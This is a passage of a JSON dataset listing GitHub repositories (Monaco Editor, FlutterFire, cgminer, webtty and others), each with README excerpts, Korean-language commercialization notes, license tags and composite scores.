[完整开源项目Project](https://github.com/XXApple/AndroidLibs/tree/master/%E5%AE%8C%E6%95%B4%E5%BC%80%E6%BA%90%E9%A1%B9%E7%9B%AEProject)\n- [布局Layout](https://github.com/XXApple/AndroidLibs/tree/master/%E5%B8%83%E5%B1%80Layout)\n- [开发框架Framework](https://github.com/XXApple/AndroidLibs/tree/master/%E5%BC%80%E5%8F%91%E6%A1%86%E6%9E%B6Framework)\n- [弹框Dialog](https://github.com/XXApple/AndroidLibs/tree/master/%E5%BC%B9%E6%A1%86Dialog)\n- [按钮Button](https://gith","composite_score":0.3661,"license_safety_tag":"safe"},{"name":"benedekrozemberczki/awesome-monte-carlo-tree-search-papers","github_url":"https://github.com/benedekrozemberczki/awesome-monte-carlo-tree-search-papers","stars":5,"language":"Python","license":"CC0-1.0","abandonment_months":4,"description":"# Awesome Monte Carlo Tree Search Papers 상용화 분석\n\n## 왜 보물인가\n복잡한 의사결정 문제를 빠르게 풀어주는 알고리즘 연구자료 모음으로, AI 기술이 정답을 확실하게 검증하지 못하는 약점을 보완할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **게임/시뮬레이션 SaaS**: 체스, 바둑, 전략게임 AI 상대방 제공 서비스","readme_excerpt":"# Awesome Monte Carlo Tree Search Papers.\n[![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) [![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat-square)](http://makeapullrequest.com)[![repo size](https://img.shields.io/github/repo-size/benedekrozemberczki/awesome-monte-carlo-tree-search-papers.svg)](https://github.com/benedekrozemberczki/awesome-monte-carlo-tree-search-papers/archive/master.zip) ![License](https://img.shields.io/github/license/benedekrozemberczki/awesome-tree-search-papers.svg?color=blue) [![benedekrozemberczki](https://img.shields.io/twitter/follow/benrozemberczki?style=social&logo=twitter)](https://twitter.com/intent/follow?screen_name=benrozemberczki) \n<p align=\"center\">\n  <img width=\"600\" src=\"tree.png\">\n</p>\n\n---------------------------------------\n\nA curated list of Monte Carlo tree search papers with implementations from the fo","composite_score":0.3659,"license_safety_tag":"unknown"},{"name":"immobiliare/fastify-metrics","github_url":"https://github.com/immobiliare/fastify-metrics","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":18,"description":"# fastify-metrics 상용화 분석\n\n## 왜 보물인가\n웹 애플리케이션의 성능을 자동으로 측정하고 모니터링하는 도구로, 서비스 품질을 객관적으로 증명할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 모니터링 대시보드**: 고객 애플리케이션의 응답 속도, 에러율, 사용자 수를 실시간으로 추적하고 보고\n2. **API 판매 플랫폼**","readme_excerpt":"<p align=\"center\"><img src=\"./logo.png\" alt=\"logo\" width=\"250px\" /></p>\n\n<h1 align=\"center\">fastify-metrics</h1>\n\n[![Release](https://github.com/immobiliare/fastify-metrics/actions/workflows/release.yml/badge.svg)](https://github.com/immobiliare/fastify-metrics/actions/workflows/release.yml)\n[![code style: prettier](https://img.shields.io/badge/code_style-prettier-ff69b4.svg?style=flat-square)](https://github.com/prettier/prettier?style=flat-square)\n[![semantic-release](https://img.shields.io/badge/%20%20%F0%9F%93%A6%F0%9F%9A%80-semantic--release-e10079.svg?style=flat-square)](https://github.com/semantic-release/semantic-release)\n![npm (scoped)](https://img.shields.io/npm/v/@immobiliarelabs/fastify-metrics)\n![license](https://img.shields.io/github/license/immobiliare/fastify-metrics)\n\n> A slighlty opinionated [Fastify](https://www.fastify.io/) plugin that collects metrics and dispatches them to [statsd](https://github.com/statsd/statsd).\n\nIf you write your services and apps using `Fast","composite_score":0.3653,"license_safety_tag":"safe"},{"name":"ckolivas/cgminer","github_url":"https://github.com/ckolivas/cgminer","stars":6,"language":"C","license":"NOASSERTION","abandonment_months":73,"description":"# cgminer 가치평가 보고서\n\n## 왜 보물인가\n비트코인 채굴을 효율적으로 할 수 있게 해주는 오픈소스 소프트웨어로, 블록체인 산업의 초기 기반을 마련했습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 암호화폐 채굴 SaaS 서비스**\n개인 채굴자들이 자신의 컴퓨터 성능을 클라우드로 관리하는 채굴 풀(Mining Pool) 운영 플랫폼\n\n**2. 채굴장 ","readme_excerpt":"This is a multi-threaded multi-pool FPGA and ASIC miner for bitcoin.\n\nThis code is provided entirely free of charge by the programmer in his spare\ntime so donations would be greatly appreciated. Please consider donating to the\naddress below. Driver development for new ASIC only bitcoin hardware can be\nsuitably sponsored.\n\nCon Kolivas <kernel@kolivas.org>\n15qSxP1SQcUX3o4nhkfdbgyoWEFMomJ4rZ\n\nNOTE: This code is licensed under the GPLv3. This means that the source to any\nmodifications you make to this code MUST be provided by law if you distribute\nmodified binaries. See COPYING for details.\n\n\nDOWNLOADS:\n\nhttp://ck.kolivas.org/apps/cgminer\n\nGIT TREE:\n\nhttps://github.com/ckolivas/cgminer\n\nSupport thread:\n\nhttp://bitcointalk.org/index.php?topic=28402.0\n\nIRC Channel:\n\nirc://irc.freenode.net/cgminer\n\nSEE ALSO API-README, ASIC-README and FGPA-README FOR MORE INFORMATION ON EACH.\n\n---\n\nEXECUTIVE SUMMARY ON USAGE:\n\nSingle pool:\n\ncgminer -o http://pool:port -u username -p password\n\nMultiple pools:\n","composite_score":0.3653,"license_safety_tag":"unknown"},{"name":"Tencent/VasSonic","github_url":"https://github.com/Tencent/VasSonic","stars":14,"language":"Java","license":"NOASSERTION","abandonment_months":38,"description":"# Tencent/VasSonic 평가 분석\n\n## 왜 보물인가\n모바일 앱에서 웹 페이지를 빠르게 로딩하는 기술로, 사용자가 기다리는 시간을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 뉴스·커머스 앱 SaaS**: 기사나 상품 페이지를 즉시 표시하는 속도 향상 솔루션으로 구독료 징수\n2. **은행·보험사 내부 도구**: 금융 ","readme_excerpt":"## VasSonic: A Lightweight And High-performance Hybrid Framework\n[![license](http://img.shields.io/badge/license-BSD3-brightgreen.svg?style=flat)](https://github.com/Tencent/VasSonic/blob/master/LICENSE)\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](https://github.com/Tencent/VasSonic/pulls)\n[![wiki](https://img.shields.io/badge/Wiki-open-brightgreen.svg)](https://github.com/Tencent/VasSonic/wiki)\n---\n\n<p align=\"center\">\n  <img alt=\"logo\" src=\"https://github.com/Tencent/VasSonic/blob/master/assets/logo.png\"/>\n</p>\n\nVasSonic is a lightweight and high-performance Hybrid framework developed by tencent VAS team,  which is intended to speed up the first screen of websites working on Android and iOS platform.\n Not only does VasSonic supports the static or dynamic websites which are rendered by server, but it is also compatible with web offline resource perfectly. \n\n VasSonic uses custom url connection instead of original network connection to request the index ht","composite_score":0.3649,"license_safety_tag":"unknown"},{"name":"wuhaoyu1990/MagicCamera","github_url":"https://github.com/wuhaoyu1990/MagicCamera","stars":5,"language":"Java","license":"unknown","abandonment_months":68,"description":"# MagicCamera 저장소 분석\n\n## 왜 보물인가\n스마트폰 카메라에 실시간 특수효과를 입혀주는 기술로, 일반인도 쉽게 멋진 영상을 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 유튜브/틱톡 크리에이터 대상 \"실시간 카메라 필터 구독 서비스\" 출시\n2. **내부 업무 도구**: 온라인 회의 시 자동으로 배경 흐림 처리하는","readme_excerpt":"# MagicCamera \n\nIdea from:android-gpuimage\n\nReal-time Filter Camera&VideoRecorder And ImageEditor With Face Beauty For Android\n\n包含美颜等40余种实时滤镜相机，可拍照、录像、图片修改 \n\n#Log:\n\n2016-5-22\n\nPerfected Project_AndroidStuido(camera mode only,if image editor is needed,find it in Project_eclispe)\nfix bugs\n\n#Introduction：\n\na Camera APP which inlcudes：\n\nOver 40 kinds of real-time filters \n\nImage editor with face beauty(Smooth Skin and White skin)\n\nThis project is still under coding and will be updated later,only used eclipse because my computer too poor to run AS T-T\n\n#Click \"Star\" if this is helpful for you!\n\n#ScreenShot\n\n![alt text](https://github.com/wuhaoyu1990/MagicCamera/blob/master/Screenshot_1.png)![alt text](https://github.com/wuhaoyu1990/MagicCamera/blob/master/Screenshot_2.png)![alt text](https://github.com/wuhaoyu1990/MagicCamera/blob/master/Screenshot_3.png)![alt text](https://github.com/wuhaoyu1990/MagicCamera/blob/master/Screenshot_4.png)\n","composite_score":0.3649,"license_safety_tag":"unknown"},{"name":"oarriaga/face_classification","github_url":"https://github.com/oarriaga/face_classification","stars":8,"language":"Python","license":"mit","abandonment_months":27,"description":"# face_classification 저장소 분석\n\n## 왜 보물인가\n사진이나 영상에서 사람의 감정(행복, 슬픔, 분노 등)을 자동으로 인식하는 기술로, 고객 만족도 측정부터 보안 감시까지 다양한 실무에 즉시 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n**1. 고객 반응 분석 SaaS**: 매장이나 강연장에서 실시간으로 방문객의 감정을 수집하고 보고","readme_excerpt":"# This repository is deprecated for at TF-2.0 rewrite visit:\n# https://github.com/oarriaga/paz\n------------------------------------------------\n# Face classification and detection.\nReal-time face detection and emotion/gender classification using fer2013/IMDB datasets with a keras CNN model and openCV.\n* IMDB gender classification test accuracy: 96%.\n* fer2013 emotion classification test accuracy: 66%.\n\nFor more information please consult the [publication](https://github.com/oarriaga/face_classification/blob/master/report.pdf)\n\n# Emotion/gender examples:\n\n![alt tag](images/demo_results.png)\n\nGuided back-prop\n![alt tag](images/gradcam_results.png)\n\nReal-time demo:\n<div align='center'>\n  <img src='images/color_demo.gif' width='400px'>\n</div>\n\n[B-IT-BOTS](https://mas-group.inf.h-brs.de/?page_id=622) robotics team :)\n![alt tag](images/robocup_team.png)\n\n## Instructions\n\n### Run real-time emotion demo:\n> python3 video_emotion_color_demo.py\n\n### Run real-time guided back-prop demo:\n> python3 ","composite_score":0.3645,"license_safety_tag":"safe"},{"name":"theme-next/hexo-theme-next","github_url":"https://github.com/theme-next/hexo-theme-next","stars":5,"language":"Stylus","license":"NOASSERTION","abandonment_months":23,"description":"# Hexo-Theme-Next 상용화 분석\n\n## 왜 보물인가\n블로그나 개인 웹사이트를 아무것도 모르는 사람도 쉽게 만들 수 있게 도와주는 디자인 템플릿이자, 5년 이상 지속적으로 관리되고 있는 검증된 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 기술 블로그 제작 플랫폼 - 개인 개발자들이 포트폴리오/기술 블로그를 30분 안에","readme_excerpt":"<div align=\"right\">\n  Language:\n  🇺🇸\n  <a title=\"Chinese\" href=\"docs/zh-CN/README.md\">🇨🇳</a>\n  <a title=\"Russian\" href=\"docs/ru/README.md\">🇷🇺</a>\n</div>\n\n# <div align=\"center\"><a title=\"NexT website repository\" href=\"https://github.com/theme-next/theme-next.org\"><img align=\"center\" width=\"56\" height=\"56\" src=\"https://raw.githubusercontent.com/theme-next/hexo-theme-next/master/source/images/logo.svg?sanitize=true\"></a> e x T</div>\n\n<p align=\"center\">\n  «NexT» is a high quality elegant <a href=\"https://hexo.io\">Hexo</a> theme. It is crafted from scratch with love.\n<br>\n<br>\n  <a href=\"https://www.npmjs.com/package/hexo-theme-next\"><img src=\"https://img.shields.io/github/package-json/v/theme-next/hexo-theme-next?style=flat-square\"></a>\n  <a href=\"https://nodejs.org\"><img src=\"https://img.shields.io/badge/node-%3E=10.9.0-green?style=flat-square\"></a>\n  <a href=\"https://hexo.io\"><img src=\"https://img.shields.io/badge/hexo-%3E=4.0.0-blue?style=flat-square&logo=hexo\"></a>\n  <a href=\"https://g","composite_score":0.3642,"license_safety_tag":"unknown"},{"name":"FirebaseExtended/flutterfire","github_url":"https://github.com/FirebaseExtended/flutterfire","stars":5,"language":"Dart","license":"BSD-3-Clause","abandonment_months":0,"description":"# FirebaseExtended/flutterfire 분석 리포트\n\n## 왜 보물인가\n구글의 클라우드 서비스(Firebase)를 모바일 앱 개발에 쉽게 연결해주는 표준 도구로, 수백만 개발자가 의존하는 필수 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n1. **모바일 앱 백엔드 서비스**: 사용자 인증, 데이터 저장, 실시간 동기화가 필요한 iOS/Andr","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://firebase.google.com/docs/flutter\">\n    <img width=\"250px\" src=\".github/images/flutterfire_300x.png\" alt=\"Flutter + Firebase logo\"><br/>\n  </a>\n  <h1 align=\"center\">FlutterFire</h1>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://twitter.com/flutterfiredev\">\n    <img src=\"https://img.shields.io/twitter/follow/flutterfiredev.svg?colorA=1da1f2&colorB=&label=Follow%20on%20Twitter&style=flat-square\" alt=\"Follow on Twitter\" />\n  </a>\n  <a href=\"https://github.com/invertase/melos\">\n    <img src=\"https://img.shields.io/badge/maintained%20with-melos-f700ff.svg?style=flat-square\" alt=\"Maintained with Melos\" />\n  </a>\n  <a href=\"https://api.securityscorecards.dev/projects/github.com/firebase/flutterfire\">\n    <img src=\"https://api.securityscorecards.dev/projects/github.com/firebase/flutterfire/badge\" alt=\"OSSF scorecard\" />\n  </a>\n</p>\n\n---\n\n[[Changelog]](./CHANGELOG.md) • [[Packages]](https://pub.dev/publishers/firebase.google.com/packages)\n\n---\n\nFlutterFire is ","composite_score":0.3641,"license_safety_tag":"safe"},{"name":"Microsoft/monaco-editor","github_url":"https://github.com/Microsoft/monaco-editor","stars":9,"language":"JavaScript","license":"MIT","abandonment_months":0,"description":"# Monaco Editor 상용화 분석\n\n## 왜 보물인가\n마이크로소프트가 만든 전 세계 개발자들이 쓰는 '코드 편집기'로, 웹브라우저에서 바로 코딩할 수 있게 해주는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 개발 플랫폼**: GitHub Codespaces, Replit 같은 웹기반 코딩 서비스에 탑재하여 언제 어디서나 코드 작성 ","readme_excerpt":"# Monaco Editor\n\n[![Versions](https://img.shields.io/npm/v/monaco-editor)](https://www.npmjs.com/package/monaco-editor)\n[![Versions](https://img.shields.io/npm/v/monaco-editor/next)](https://www.npmjs.com/package/monaco-editor)\n[![Feature Requests](https://img.shields.io/github/issues/microsoft/monaco-editor/feature-request.svg)](https://github.com/microsoft/monaco-editor/issues?q=is%3Aopen+is%3Aissue+label%3Afeature-request+sort%3Areactions-%2B1-desc)\n[![Bugs](https://img.shields.io/github/issues/microsoft/monaco-editor/bug.svg)](https://github.com/microsoft/monaco-editor/issues?utf8=✓&q=is%3Aissue+is%3Aopen+label%3Abug)\n\nThe Monaco Editor is the fully featured code editor from [VS Code](https://github.com/microsoft/vscode). Check out the [VS Code docs](https://code.visualstudio.com/docs/editor/editingevolved) to see some of the supported features.\n\n![image](https://user-images.githubusercontent.com/5047891/94183711-290c0780-fea3-11ea-90e3-c88ff9d21bd6.png)\n\n## Try it out\n\nTry out the","composite_score":0.3641,"license_safety_tag":"safe"},{"name":"zsdonghao/tensorlayer","github_url":"https://github.com/zsdonghao/tensorlayer","stars":5,"language":"Python","license":"apache-2.0","abandonment_months":40,"description":"# TensorLayer 저장소 분석\n\n## 왜 보물인가\n인공지능 모델을 쉽게 만들고 학습시킬 수 있는 오픈소스 도구로, 복잡한 AI 개발을 단순화합니다.\n\n## 어디에 쓸 수 있나\n\n1. **AI 분석 SaaS 서비스**: 기업의 데이터를 분석해주는 클라우드 기반 서비스로 월 구독료 징수\n2. **내부 업무 도구**: 대기업의 이미지 인식, 문서 분류 등","readme_excerpt":"<a href=\"https://tensorlayer.readthedocs.io/\">\n    <div align=\"center\">\n        <img src=\"img/tl_transparent_logo.png\" width=\"50%\" height=\"30%\"/>\n    </div>\n</a>\n\n<!--- [![PyPI Version](https://badge.fury.io/py/tensorlayer.svg)](https://badge.fury.io/py/tensorlayer) --->\n<!--- ![PyPI - Python Version](https://img.shields.io/pypi/pyversions/tensorlayer.svg)) --->\n\n![GitHub last commit (branch)](https://img.shields.io/github/last-commit/tensorlayer/tensorlayer/master.svg)\n[![Supported TF Version](https://img.shields.io/badge/TensorFlow-2.0.0%2B-brightgreen.svg)](https://github.com/tensorflow/tensorflow/releases)\n[![Documentation Status](https://readthedocs.org/projects/tensorlayer/badge/)](https://tensorlayer.readthedocs.io/)\n[![Build Status](https://travis-ci.org/tensorlayer/tensorlayer.svg?branch=master)](https://travis-ci.org/tensorlayer/tensorlayer)\n[![Downloads](http://pepy.tech/badge/tensorlayer)](http://pepy.tech/project/tensorlayer)\n[![Downloads](https://pepy.tech/badge/tensorlay","composite_score":0.3637,"license_safety_tag":"safe"},{"name":"apple/swift-sample-distributed-actors-transport","github_url":"https://github.com/apple/swift-sample-distributed-actors-transport","stars":8,"language":"Swift","license":"Apache-2.0","abandonment_months":18,"description":"# apple/swift-sample-distributed-actors-transport 분석\n\n## 왜 보물인가\nApple이 공식 제공하는 분산 시스템 통신 샘플로, 여러 컴퓨터 간 안전한 데이터 교환 기술의 표준 구현을 보여줍니다.\n\n## 어디에 쓸 수 있나\n1. **실시간 협업 도구 SaaS**: 여러 사용자의 작업을 동시에 동기화하는 온라인 협업 플","readme_excerpt":"# swift-sample-distributed-actors-transport\n\nSample application showcasing a simplistic [`DistributedActorSystem`](https://developer.apple.com/documentation/distributed/distributedactorsystem) implementation, associated with `distributed actor` language evolution proposal.\n\n## Running the sample app\n\n> Note: Distributed actors are part of Swift since Swift 5.7, so make sure you are using a recent-enough Swift to run this sample.\n\nTo run the sample app, use the following command:\n\n```\ncd SampleApp\nswift run FishyActorsDemo \n```\n\nIf you wanted to perform the invocation manually, it would look something like this:\n\n### The sample `DistributedActorSystem` implementation\n\nThis project includes a sample implementation of the [`DistributedActorSystem`](https://developer.apple.com/documentation/distributed/distributedactorsystem),\nthat ships in the `Distributed` module along with Swift 5.7+. A distributed actor system is what enables actors to be declared as `distributed actor`, and \nmake call","composite_score":0.3636,"license_safety_tag":"safe"},{"name":"LitePalFramework/LitePal","github_url":"https://github.com/LitePalFramework/LitePal","stars":10,"language":"Java","license":"apache-2.0","abandonment_months":46,"description":"# LitePal Framework 분석 보고서\n\n## 왜 보물인가\n안드로이드 앱 개발자들이 복잡한 데이터 저장 작업을 간단하게 처리할 수 있게 해주는 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소 모바일 앱 개발사를 위한 '데이터 관리 클라우드 서비스' - 개발자들이 복잡한 설정 없이 바로 사용할 수 있는 구독형 플","readme_excerpt":"# LitePal for Android  \n![Logo](https://github.com/LitePalFramework/LitePal/blob/master/sample/src/main/logo/mini_logo.png) \n\n[中文文档](https://blog.csdn.net/sinyu890807/category_9262963.html)\n\nLitePal is an open source Android library that allows developers to use SQLite database extremely easy. You can finish most of the database operations without writing even a SQL statement, including create or upgrade tables, crud operations, aggregate functions, etc. The setup of LitePal is quite simple as well, you can integrate it into your project in less than 5 minutes. \n\nExperience the magic right now and have fun!\n\n## Features\n * Using object-relational mapping (ORM) pattern.\n * Almost zero-configuration(only one configuration file with few properties).\n * Maintains all tables automatically(e.g. create, alter or drop tables).\n * Multi databases supported.\n * Encapsulated APIs for avoiding writing SQL statements.\n * Awesome fluent query API.\n * Alternative choice to use SQL still, but easier a","composite_score":0.3636,"license_safety_tag":"safe"},{"name":"liuwons/wxBot","github_url":"https://github.com/liuwons/wxBot","stars":6,"language":"Python","license":"apache-2.0","abandonment_months":37,"description":"# wxBot 상용화 분석\n\n## 왜 보물인가\n카카오톡이나 라인 같은 메신저로 자동으로 답장하고 업무를 처리해주는 봇을 만들 수 있어서, 소상공인부터 중소기업까지 고객 응대 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: \"메신저 자동응답 관리 플랫폼\" - 음식점, 미용실, 학원 등이 월 구독으로 고객 문의에 자동","readme_excerpt":"\n**本项目已停止维护**\n","composite_score":0.3636,"license_safety_tag":"safe"},{"name":"vagabond-systems/forage-lyft-starter-repo","github_url":"https://github.com/vagabond-systems/forage-lyft-starter-repo","stars":112,"language":"Python","license":"NOASSERTION","abandonment_months":22,"description":"","readme_excerpt":"","composite_score":0.3636,"license_safety_tag":"unknown"},{"name":"vue-bulma/vue-admin","github_url":"https://github.com/vue-bulma/vue-admin","stars":7,"language":"","license":"unknown","abandonment_months":75,"description":"# vue-admin 기술 자산 분석\n\n## 왜 보물인가\n웹 사이트의 관리 화면을 빠르게 만들 수 있는 기초 틀을 제공하는 오픈소스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객사가 자신의 데이터를 관리할 수 있는 대시보드 화면 구축\n2. **내부 업무 도구**: 직원들이 회사 데이터를 조회하고 수정하는 관리 시스템 개발\n3","readme_excerpt":"<h1 align=\"center\">Vue Bulma</h1>\n<div align=\"center\">\n  <p><strong>WIP</strong></p>We are refactoring it, using the latest Vue and Bulma.\n</div>\n\n<br />\n\n### Todo\n\n- [ ] vue-next\n- [ ] vue-bulma\n  - [ ] bulma v0.8\n  - [ ] modules\n\n### Sponsors\n\nCurrently, I am a freelancer and my income is not very stable.\nI very much hope to become a full-time open source developer.\nIf you are interested in this project, I hope you can support it.\nThank you so much!\n","composite_score":0.3635,"license_safety_tag":"unknown"},{"name":"yenchenlin/awesome-NeRF","github_url":"https://github.com/yenchenlin/awesome-NeRF","stars":11,"language":"TeX","license":"MIT","abandonment_months":17,"description":"# awesome-NeRF 분석\n\n## 왜 보물인가\n사진이나 비디오처럼 2D 이미지로 실제 3D 공간을 디지털화하는 최신 기술의 모든 연구 자료를 한 곳에 모아놓은 학습 자산입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 부동산 중개 플랫폼에서 아파트를 3D로 투어 가능하게 제공하는 가상 견학 서비스\n2. **내부 업무 도구**: 게임·","readme_excerpt":"# Awesome Neural Radiance Fields [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome)\nA curated list of awesome neural radiance fields papers, inspired by [awesome-computer-vision](https://github.com/jbhuang0604/awesome-computer-vision).\n\n\n#### [How to submit a pull request?](https://github.com/yenchenlin/awesome-NeRF/blob/main/how-to-PR.md)\n#### [Want to help maintain the list?](https://github.com/awesome-NeRF/awesome-NeRF/issues/108#issuecomment-1350732470)\n\n\n## Table of Contents\n\n- [Survey](#survey)\n- [Papers](#papers)\n- [Talks](#talks)\n- [Implementations](#implementations)\n\n## Survey\n- [Semantically-aware Neural Radiance Fields for Visual Scene Understanding: A Comprehensive Review](https://arxiv.org/abs/2402.11141), Thang-Anh-Quan Nguyen*, Amine Bourki*, Màtyàs Macudzinski, Anthony Brunel, and Mohammed Bennamoun (*: Equal contribution), Arxiv 2024 | [github](https://github.com/ab","composite_score":0.3632,"license_safety_tag":"safe"},{"name":"pagekit/vue-resource","github_url":"https://github.com/pagekit/vue-resource","stars":14,"language":"JavaScript","license":"mit","abandonment_months":42,"description":"# vue-resource 평가 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 인터넷을 통해 데이터를 주고받는 작업을 간단하게 만들어주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 프로젝트 관리 도구에서 사용자 데이터를 서버와 실시간으로 동기화\n2. **내부 업무 도구**: 회사 직원들이 사용하는 급여 관리, 출퇴근 ","readme_excerpt":"# vue-resource [![Build](https://circleci.com/gh/pagekit/vue-resource.svg?style=shield)](https://circleci.com/gh/pagekit/vue-resource) [![Downloads](https://img.shields.io/npm/dm/vue-resource.svg)](https://www.npmjs.com/package/vue-resource) [![jsdelivr](https://data.jsdelivr.com/v1/package/npm/vue-resource/badge?style=rounded)](https://www.jsdelivr.com/package/npm/vue-resource) [![Version](https://img.shields.io/npm/v/vue-resource.svg)](https://www.npmjs.com/package/vue-resource) [![License](https://img.shields.io/npm/l/vue-resource.svg)](https://www.npmjs.com/package/vue-resource)\n\nThe plugin for [Vue.js](http://vuejs.org) provides services for making web requests and handle responses using a [XMLHttpRequest](https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest) or JSONP.\n\n## Features\n\n- Supports the [Promise](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Promise) API and [URI Templates](https://medialize.github.io/URI.js/uri-template.htm","composite_score":0.3631,"license_safety_tag":"safe"},{"name":"JasonGT/NorthwindTraders","github_url":"https://github.com/JasonGT/NorthwindTraders","stars":13,"language":"C#","license":"mit","abandonment_months":35,"description":"# NorthwindTraders 저장소 분석\n\n## 왜 보물인가\n13년 전 만들어진 클래식 예제 프로젝트로, 초보자부터 전문가까지 학습하고 실무에 바로 적용할 수 있는 완성된 비즈니스 시스템의 청사진입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소상공인을 위한 온라인 주문/재고 관리 시스템으로 월 구독 판매\n- **내부 업무 도구**: ","readme_excerpt":"# Northwind Traders\n\n[![License](https://img.shields.io/badge/License-MIT-blue.svg)](LICENSE)\n\n## Description\n\nThis repository has been archived and is no longer actively maintained or supported. The project was initially developed to demonstrate the simplest approach to Clean Architecture with .NET Core. While it is no longer actively maintained, feel free to explore the codebase and adapt it to your own needs if it serves as a useful reference.\n\nFor an updated version of this project, you can check out the [Clean Architecture Solution Template](https://github.com/jasontaylordev/CleanArchitecture). The Clean Architecture Solution Template is a new project that demonstrates the simplest approach to Clean Architecture with .NET. It is actively maintained and supported, providing an improved and up-to-date implementation of the principles showcased in this archived repository.\n\n## Project Status\n\nThis project has been archived, which means that no further updates, bug fixes, or support w","composite_score":0.3631,"license_safety_tag":"safe"},{"name":"sylnsfar/qrcode","github_url":"https://github.com/sylnsfar/qrcode","stars":6,"language":"Python","license":"gpl-3.0","abandonment_months":30,"description":"# QR코드 생성 도구 분석\n\n## 왜 보물인가\n명함, 포스터, 상품 등 어디든 붙일 수 있는 QR코드를 자동으로 만들어주는 간단한 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 매장이 상품마다 다른 QR코드를 대량으로 생성해야 할 때 웹 서비스로 제공\n2. **내부 업무 도구**: 기업 자산 관리, 창고 물품 추적, 배송 시","readme_excerpt":"# Amazing-QR\n\n[![former name](https://img.shields.io/badge/old%20name-MyQR-yellow)](https://pypi.org/project/myqr/) [![PyPI - Downloads](https://img.shields.io/pypi/dm/myqr?label=downloads@myqr)](https://pypi.org/project/myqr/) [![](https://img.shields.io/badge/language-Python-blue)](https://www.python.org/) ![PyPI - Python Version](https://img.shields.io/pypi/pyversions/amzqr?logo=python&logoColor=ffffff&label=Python&labelColor=blue&color=ffffff) [![PyPI](https://img.shields.io/pypi/v/amzqr?logo=pypi&logoColor=ffffff&label=PyPI&labelColor=blue)](https://pypi.org/project/amzqr/) ![PyPI - Wheel](https://img.shields.io/pypi/wheel/amzqr) [![PyPI - Downloads](https://img.shields.io/pypi/dm/amzqr)](https://pypi.org/project/amzqr/) [![PyPI - License](https://img.shields.io/pypi/l/amzqr)](https://github.com/x-hw/amazing-qr/blob/master/LICENSE.md) ![GitHub code size in bytes](https://img.shields.io/github/languages/code-size/x-hw/amazing-qr) ![macos](https://img.shields.io/badge/-macOS-black?l","composite_score":0.363,"license_safety_tag":"restricted"},{"name":"maxmcd/webtty","github_url":"https://github.com/maxmcd/webtty","stars":7,"language":"Go","license":"MIT","abandonment_months":18,"description":"# webtty 상품화 분석\n\n## 왜 보물인가\n웹 브라우저에서 직접 터미널(컴퓨터 명령창)을 실행할 수 있게 해주는 기술로, 복잡한 설치 없이 어디서나 컴퓨터를 원격으로 제어할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **클라우드 개발 환경 SaaS**: 개발자가 브라우저만으로 서버에 접속해 코드를 작성·실행하는 웹 기반 IDE 서비스\n2. **I","readme_excerpt":"![](https://raw.githubusercontent.com/maxmcd/webtty/70f7911f4e69dffe3eb3cfd6ad9dd8060dc10dd5/out.gif)\n\n## WebTTY\n\nWebTTY allows you to share a terminal session from your machine using WebRTC. You can pair with a friend without setting up a proxy server, debug servers behind NATs, and more. WebTTY also works in-browser. You can connect to a WebTTY session from this static page:  [https://maxmcd.github.io/webtty/](https://maxmcd.github.io/webtty/)\n\n### Status\n\nThere are a handful of bugs to fix, but everything works pretty well at the moment. Please open an issue if you find a bug.\n\n### Installation\n\nDownload a binary from the releases page: https://github.com/maxmcd/webtty/releases\n\nOr, install directly with Go. WebTTY requires Go version 1.9 or higher.\n\nFor Go versions below 1.7:\n```bash\ngo get -u github.com/maxmcd/webtty\n```\n\nFor Go versions 1.7 and up:\n```bash\ngo install github.com/maxmcd/webtty@latest\n```\n\n\nThere were recent breaking api changes in the pion/webrtc library. Make sure","composite_score":0.3628,"license_safety_tag":"safe"},{"name":"ChrisDryden/Canadian-Tech-Internships-Summer-2022","github_url":"https://github.com/ChrisDryden/Canadian-Tech-Internships-Summer-2022","stars":5,"language":"","license":"unknown","abandonment_months":18,"description":"# Canadian-Tech-Internships-Summer-2022 분석\n\n## 왜 보물인가\n캐나다의 기술 회사 인턴십 기회를 한곳에 모아놓아서, 학생들이 취업 정보를 찾는 시간을 크게 줄일 수 있는 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 학생 대상 구직 플랫폼 - 인턴십 정보를 자동 업데이트하는 구독형 서비스\n2. **내","readme_excerpt":"# Canadian Tech Internships and New Grad 2025 